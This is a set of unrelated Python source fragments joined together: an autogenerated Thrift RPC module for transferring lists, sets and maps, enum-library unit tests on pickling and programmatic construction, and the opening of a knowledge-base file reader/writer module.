Number of digits to use for the observation number in the output
file names. If None, this is set by the number of configurations to
write. E.g., 9 observations or less yield ``ndig=1``, 10-99
observations yield ``ndig=2``, etc.
tight (:obj:`bool`, optional):
Output the configuration in "tight" format, where unallocated
apertures are not included.
target_file (:obj:`str`, optional):
Name of the file with the original targets. If provided, will be
included in header of output configuration files.
ra_c (:obj:`int`, optional):
1-indexed column number with the RA coordinates in ``target_file``.
Ignored if ``target_file`` is None.
dec_c (:obj:`int`, optional):
1-indexed column number with the DEC coordinates in ``target_file``.
Ignored if ``target_file`` | |
<filename>Middleware/Thrift-homework/src/main/py/gen_py/transfer/Transfer.py
#
# Autogenerated by Thrift Compiler (0.14.1)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
all_structs = []
class Iface(object):
def transferList(self, data):
"""
Parameters:
- data
"""
pass
def transferSet(self, data):
"""
Parameters:
- data
"""
pass
def transferMap(self, data):
"""
Parameters:
- data
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def transferList(self, data):
"""
Parameters:
- data
"""
self.send_transferList(data)
return self.recv_transferList()
def send_transferList(self, data):
self._oprot.writeMessageBegin('transferList', TMessageType.CALL, self._seqid)
args = transferList_args()
args.data = data
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_transferList(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = transferList_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "transferList failed: unknown result")
def transferSet(self, data):
"""
Parameters:
- data
"""
self.send_transferSet(data)
return self.recv_transferSet()
def send_transferSet(self, data):
self._oprot.writeMessageBegin('transferSet', TMessageType.CALL, self._seqid)
args = transferSet_args()
args.data = data
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_transferSet(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = transferSet_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "transferSet failed: unknown result")
def transferMap(self, data):
"""
Parameters:
- data
"""
self.send_transferMap(data)
return self.recv_transferMap()
def send_transferMap(self, data):
self._oprot.writeMessageBegin('transferMap', TMessageType.CALL, self._seqid)
args = transferMap_args()
args.data = data
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_transferMap(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = transferMap_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "transferMap failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["transferList"] = Processor.process_transferList
self._processMap["transferSet"] = Processor.process_transferSet
self._processMap["transferMap"] = Processor.process_transferMap
self._on_message_begin = None
def on_message_begin(self, func):
self._on_message_begin = func
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if self._on_message_begin:
self._on_message_begin(name, type, seqid)
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_transferList(self, seqid, iprot, oprot):
args = transferList_args()
args.read(iprot)
iprot.readMessageEnd()
result = transferList_result()
try:
result.success = self._handler.transferList(args.data)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("transferList", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_transferSet(self, seqid, iprot, oprot):
args = transferSet_args()
args.read(iprot)
iprot.readMessageEnd()
result = transferSet_result()
try:
result.success = self._handler.transferSet(args.data)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("transferSet", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_transferMap(self, seqid, iprot, oprot):
args = transferMap_args()
args.read(iprot)
iprot.readMessageEnd()
result = transferMap_result()
try:
result.success = self._handler.transferMap(args.data)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("transferMap", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class transferList_args(object):
"""
Attributes:
- data
"""
def __init__(self, data=None,):
self.data = data
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.data = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in range(_size0):
_elem5 = iprot.readI32()
self.data.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('transferList_args')
if self.data is not None:
oprot.writeFieldBegin('data', TType.LIST, 1)
oprot.writeListBegin(TType.I32, len(self.data))
for iter6 in self.data:
oprot.writeI32(iter6)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(transferList_args)
transferList_args.thrift_spec = (
None, # 0
(1, TType.LIST, 'data', (TType.I32, None, False), None, ), # 1
)
class transferList_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I64:
self.success = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('transferList_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I64, 0)
oprot.writeI64(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(transferList_result)
transferList_result.thrift_spec = (
(0, TType.I64, 'success', None, None, ), # 0
)
class transferSet_args(object):
"""
Attributes:
- data
"""
def __init__(self, data=None,):
self.data = data
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.SET:
self.data = set()
(_etype10, _size7) = iprot.readSetBegin()
for _i11 in range(_size7):
_elem12 = iprot.readI32()
self.data.add(_elem12)
iprot.readSetEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('transferSet_args')
if self.data is not None:
oprot.writeFieldBegin('data', TType.SET, 1)
oprot.writeSetBegin(TType.I32, len(self.data))
for iter13 in self.data:
oprot.writeI32(iter13)
oprot.writeSetEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(transferSet_args)
transferSet_args.thrift_spec = (
None, # 0
(1, TType.SET, 'data', (TType.I32, None, False), None, ), # 1
)
class transferSet_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I64:
self.success = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('transferSet_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I64, 0)
oprot.writeI64(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(transferSet_result)
transferSet_result.thrift_spec = (
(0, TType.I64, 'success', None, None, ), # 0
)
class transferMap_args(object):
"""
Attributes:
- data
"""
def __init__(self, data=None,):
self.data = data
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.MAP:
self.data = {}
(_ktype15, _vtype16, _size14) = iprot.readMapBegin()
for _i18 in range(_size14):
_key19 = iprot.readI32()
_val20 = iprot.readI32()
self.data[_key19] = _val20
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('transferMap_args')
if self.data is not None:
oprot.writeFieldBegin('data', TType.MAP, 1)
oprot.writeMapBegin(TType.I32, TType.I32, len(self.data))
for kiter21, viter22 in self.data.items():
oprot.writeI32(kiter21)
oprot.writeI32(viter22)
| |
Exception):
raise IntStooges
test_pickle_dump_load(self.assertTrue, IntStooges.CURLY)
test_pickle_dump_load(self.assertTrue, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertTrue, FloatStooges.CURLY)
test_pickle_dump_load(self.assertTrue, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertTrue, Answer.him)
test_pickle_dump_load(self.assertTrue, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertTrue, Question.who)
test_pickle_dump_load(self.assertTrue, Question)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = _reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum('BadPickle', 'dill sweet bread-n-butter')
aenum._make_class_unpicklable(BadPickle)
globals()['BadPickle'] = BadPickle
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertTrue(Period(2) is Period.noon)
self.assertTrue(getattr(Period, 'night') is Period.night)
self.assertTrue(Period['morning'] is Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__hash__'))
def test_iteration_order(self):
class Season(Enum):
__order__ = 'SUMMER WINTER AUTUMN SPRING'
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_iteration_order_reversed(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_iteration_order_with_unorderable_values(self):
class Complex(Enum):
a = complex(7, 9)
b = complex(3.14, 2)
c = complex(1, -1)
d = complex(-77, 32)
self.assertEqual(
list(Complex),
[Complex.a, Complex.b, Complex.c, Complex.d],
)
def test_programatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
dict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
if pyver < 3.0:
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split()):
i += 1
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split()):
i += 1
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_unicode(self):
SummerMonth = Enum('SummerMonth', unicode('june july august'))
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_unicode_list(self):
SummerMonth = Enum('SummerMonth', [unicode('june'), unicode('july'), unicode('august')])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_unicode_iterable(self):
SummerMonth = Enum(
'SummerMonth',
((unicode('june'), 1), (unicode('july'), 2), (unicode('august'), 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_from_unicode_dict(self):
SummerMonth = Enum(
'SummerMonth',
dict(((unicode('june'), 1), (unicode('july'), 2), (unicode('august'), 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
if pyver < 3.0:
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_unicode_type(self):
SummerMonth = Enum('SummerMonth', unicode('june july august'), type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programatic_function_unicode_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', unicode('june july august'))
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_programmatic_function_unicode_class(self):
if pyver < 3.0:
class_names = unicode('SummerMonth'), 'S\xfcmm\xe9rM\xf6nth'.decode('latin1')
else:
class_names = 'SummerMonth', 'S\xfcmm\xe9rM\xf6nth'
for i, class_name in enumerate(class_names):
if pyver < 3.0 and i == 1:
self.assertRaises(TypeError, Enum, class_name, unicode('june july august'))
else:
SummerMonth = Enum(class_name, unicode('june july august'))
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate(unicode('june july august').split()):
i += 1
e = SummerMonth(i)
self.assertEqual(e.value, i)
self.assertEqual(e.name, month)
self.assertTrue(e in SummerMonth)
self.assertTrue(type(e) is SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, '<NAME>')
self.assertTrue(Name.BDFL, Name('<NAME>'))
self.assertTrue(Name.BDFL is getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertTrue, Name.BDFL)
def test_extending(self):
def bad_extension():
class Color(Enum):
red = 1
green = 2
blue = 3
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertRaises(TypeError, bad_extension)
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertFalse(type(whatever.really) is whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
def wrong_inherit():
class Wrong(Enum, str):
NotHere = 'error before this point'
self.assertRaises(TypeError, wrong_inherit)
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertTrue(Number.one._member_type_ is int)
self.assertTrue(Number._member_type_ is int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertTrue(String.yarn._member_type_ is str)
self.assertTrue(String._member_type_ is str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertTrue(Plain.vanilla._member_type_ is object)
self.assertTrue(Plain._member_type_ is object)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertTrue(Monochrome(Gender.female) is Monochrome.white)
def test_mixed_enum_in_call_2(self):
class | |
<filename>wc_kb/io.py
""" Reading and writing knowledge bases to/from files.
Supported file types:
* Comma separated values (.csv)
* Excel (.xlsx)
* Tab separated values (.tsv)
:Author: <NAME> <<EMAIL>>
:Date: 2018-02-12
:Copyright: 2018, Karr Lab
:License: MIT
"""
from . import core
from . import eukaryote
from . import prokaryote
from . import util
from wc_utils.util.string import indent_forest
import Bio.SeqIO
import Bio.SeqRecord
import obj_tables
import os
import shutil
import wc_kb
import wc_kb.config.core
import warnings
PROKARYOTE_MODELS = (
core.KnowledgeBase,
core.Cell,
core.Compartment,
core.DnaSpeciesType,
core.ChromosomeFeature,
prokaryote.TranscriptionUnitLocus,
prokaryote.GeneLocus,
prokaryote.RnaSpeciesType,
prokaryote.ProteinSpeciesType,
core.ComplexSpeciesType,
core.MetaboliteSpeciesType,
core.SpeciesTypeProperty,
core.Concentration,
core.Observable,
core.Reaction,
core.RateLaw,
core.Parameter,
core.Evidence,
core.Experiment,
core.Reference)
EUKARYOTE_MODELS = (
core.KnowledgeBase,
core.Cell,
core.Compartment,
core.DnaSpeciesType,
eukaryote.GeneLocus,
eukaryote.RegulatoryModule,
eukaryote.TranscriptSpeciesType,
eukaryote.ProteinSpeciesType,
eukaryote.PtmSite,
core.ComplexSpeciesType,
core.MetaboliteSpeciesType,
core.SpeciesTypeProperty,
core.Concentration,
core.Observable,
core.Reaction,
core.RateLaw,
core.Parameter,
core.Evidence,
core.Experiment,
core.Reference)
class Writer(obj_tables.io.Writer):
""" Write knowledge base to file(s) """
def run(self, core_path, knowledge_base,
seq_path=None, rewrite_seq_path=True, taxon='prokaryote',
models=None, get_related=True, include_all_attributes=False, validate=True,
title=None, description=None, keywords=None, version=None, language=None, creator=None,
write_schema=False, write_toc=True,
extra_entries=0, data_repo_metadata=False, schema_package=None, protected=True):
""" Write knowledge base to file(s)
Args:
knowledge_base (:obj:`core.KnowledgeBase`): knowledge base
core_path (:obj:`str`): path to save core knowledge base
seq_path (:obj:`str`, optional): path to save genome sequence
rewrite_seq_path (:obj:`bool`, optional): if :obj:`True`, the path to genome sequence in the saved knowledge base
will be updated to the newly saved seq_path
taxon (:obj:`str`, optional): type of model order to use
models (:obj:`list` of :obj:`Model`, optional): models in the order that they should
appear as worksheets; all models which are not in `models` will
follow in alphabetical order
